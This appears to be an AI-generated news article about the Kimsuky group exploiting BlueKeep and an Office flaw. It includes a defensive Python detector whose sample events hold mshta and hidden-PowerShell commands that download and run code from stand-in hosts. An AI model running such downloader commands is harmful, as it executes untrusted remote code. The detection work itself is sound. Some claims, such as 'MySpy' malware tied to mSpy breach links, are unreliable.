Ethical Hacking News
A North Korea-linked group known as Kimsuky has been linked to a sophisticated attack campaign that exploited a patched Microsoft Remote Desktop Services flaw to gain unauthorized access to compromised systems. The group's use of multiple vectors in their attack campaign highlights their sophistication and persistence as a threat actor, and underscores the need for organizations to prioritize cybersecurity measures to mitigate these threats.
- Kimsuky, a North Korea-linked group, has been linked to the Reconnaissance General Bureau (RGB) foreign intelligence service since 2013.
- The group exploited a patched Microsoft Remote Desktop Services flaw (BlueKeep) to gain initial access to target systems in 2023.
- Kimsuky used spear-phishing messages, PowerShell scripts, and malware such as PebbleDash and RDP Wrapper to maintain remote access to infected systems.
- The group used multiple vectors, including exploiting a Microsoft Office Equation Editor vulnerability, to distribute malware.
- Kimsuky targeted organizations in several countries, including South Korea, the U.S., China, Japan, and others, since September 2023.
- The group's primary target appears to be organizations involved in think tanks and government institutions.
- The discovery highlights the ongoing threat posed by state-sponsored hackers and the importance of prioritizing cybersecurity measures.
Cybersecurity experts have been left reeling from a recent discovery of a highly sophisticated attack campaign carried out by a North Korea-linked group known as Kimsuky. The group, also referred to as ARCHIPELAGO, Black Banshee, Thallium, Velvet Chollima, and APT43, has been linked to the Reconnaissance General Bureau (RGB) foreign intelligence service since its inception in 2013.
According to researchers at AhnLab SEcurity intelligence Center (ASEC), Kimsuky exploited a patched Microsoft Remote Desktop Services flaw, known as BlueKeep (CVE-2019-0708), to gain initial access to target systems. This vulnerability was disclosed and patched by Microsoft in 2019; the ASEC researchers nevertheless found the group exploiting it to gain unauthorized access to target systems.
The attack campaign, tracked as Larva-24005, involved a range of tactics, including the use of spear-phishing messages to distribute malicious files. These files were designed to execute PowerShell or Mshta scripts, which would then download malware such as PebbleDash and RDP Wrapper, allowing the attackers to maintain remote access to infected systems.
In addition to exploiting the BlueKeep vulnerability, Kimsuky also utilized other methods to distribute malware, including attaching the same file to emails and exploiting a Microsoft Office Equation Editor vulnerability (CVE-2017-11882). The group's use of multiple vectors in their attack campaign highlights their sophistication and persistence as a threat actor.
Once they gained access to the systems, the attackers modified the configuration by installing MySpy malware and RDPWrap to maintain remote access. In the final stage of the attack, Kimsuky deployed keyloggers, such as KimaLogger or RandomQuery, to record keystrokes.
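The chain described above (Office or Equation Editor spawning a script host, PowerShell or Mshta fetching a second stage, and RDP Wrapper being installed for remote access) can be checked in process-creation telemetry. The following detection script is an added example written for this article, not code from ASEC or the attackers; the sample events are constructed, and the RDP Wrapper artefact names (RDPWInst.exe, rdpwrap.dll) are assumed from that tool's published file names.

```python
from __future__ import annotations
import re

# Script hosts that deliver the second stage in the chain described above.
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Office / Equation Editor binaries that should not normally spawn script hosts.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
# Command-line fragments typical of a script that fetches a payload.
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|https?://", re.I)
# RDP Wrapper artefacts (assumed names: its installer RDPWInst.exe and rdpwrap.dll/.ini).
RDPWRAP_RE = re.compile(r"rdpwinst\.exe|rdpwrap\.(dll|ini)", re.I)


def classify(parent_image: str, image: str, command_line: str) -> list[str]:
    """Return the detection reasons that apply to one process-creation event."""
    parent, image, cmd = parent_image.lower(), image.lower(), command_line.lower()
    reasons = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append("office-spawned-script-host")   # e.g. Equation Editor -> mshta
    if image in SCRIPT_HOSTS and DOWNLOAD_RE.search(cmd):
        reasons.append("script-host-downloader")       # PowerShell/Mshta fetching a payload
    if RDPWRAP_RE.search(cmd) or RDPWRAP_RE.search(image):
        reasons.append("rdp-wrapper-install")          # RDPWrap remote-access persistence
    return reasons


def scan(events: list[tuple[str, str, str]]) -> list[tuple[str, list[str]]]:
    """Run classify() over (parent_image, image, command_line) tuples; keep only hits."""
    hits = []
    for parent_image, image, command_line in events:
        reasons = classify(parent_image, image, command_line)
        if reasons:
            hits.append((image.lower(), reasons))
    return hits


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    ("explorer.exe", "WINWORD.EXE", r'"C:\Program Files\Microsoft Office\WINWORD.EXE" report.docx'),
    ("EQNEDT32.EXE", "mshta.exe", "mshta.exe http://payload.example/update.hta"),
    ("explorer.exe", "powershell.exe",
     "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://c2.example/p')\""),
    ("cmd.exe", "RDPWInst.exe", "RDPWInst.exe -i -o"),
    ("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for image, reasons in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(reasons)}")
```

The benign Word launch and the svchost event produce no hits; the three stages of the chain each produce at least one reason, so the same logic can be applied to Sysmon Event ID 1 or Windows 4688 records exported as tuples.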
The ASEC researchers noted that Kimsuky had previously targeted organizations in South Korea, the U.S., China, Japan, Germany, Singapore, and several other countries since September 2023. Their activity has included phishing campaigns against South Korea and Japan and attacks on South Korea's software, energy, and financial sectors starting in October 2023.
The Kimsuky group is believed to work under the control of the Reconnaissance General Bureau (RGB) foreign intelligence service, which is responsible for collecting and analyzing information related to national security. The group's primary target appears to be organizations involved in think tanks and government institutions, although they have also targeted other sectors such as finance and technology.
The discovery of Kimsuky's attack campaign highlights the ongoing threat posed by state-sponsored hackers and their sophisticated methods for exploiting vulnerabilities in software and networks. As cybersecurity experts continue to monitor the group's activities, it is essential that organizations take steps to protect themselves from similar attacks.
In light of this development, it is crucial that organizations prioritize cybersecurity measures, including regular vulnerability assessments, penetration testing, and employee training on phishing and malware awareness. By taking proactive steps to mitigate these threats, organizations can significantly reduce their risk of being targeted by sophisticated attackers like Kimsuky.
Related Information:
https://www.ethicalhackingnews.com/articles/Kimsuky-APT-Exploits-BlueKeep-RDP-Flaw-in-Sophisticated-Attack-Campaign-ehn.shtml
https://securityaffairs.com/176756/apt/kimsuky-apt-exploited-bluekeep-rdp-flaw-in-attacks-against-south-korea-and-japan.html
https://nvd.nist.gov/vuln/detail/CVE-2019-0708
https://www.cvedetails.com/cve/CVE-2019-0708/
https://nvd.nist.gov/vuln/detail/CVE-2017-11882
https://www.cvedetails.com/cve/CVE-2017-11882/
https://www.malwarebytes.com/blog/news/2024/07/dangerous-monitoring-tool-mspy-suffers-data-breach-exposes-customer-details
https://techcrunch.com/2024/07/11/mspy-spyware-millions-customers-data-breach/
https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-301a
https://thesecmaster.com/blog/kimsuky-apt-group
https://en.wikipedia.org/wiki/Kimsuky
https://social.cyware.com/news/thallium-hacking-groups-malicious-websites-tracked-and-taken-down-by-microsoft-d7b37006
https://attack.mitre.org/groups/G0094/
https://www.picussecurity.com/resource/blog/exposing-the-steps-of-the-kimsuky-apt-group
https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/
https://thehackernews.com/2023/04/google-tag-warns-of-north-korean-linked.html
Published: Mon Apr 21 14:53:17 2025 by llama3.2 3B Q4_K_M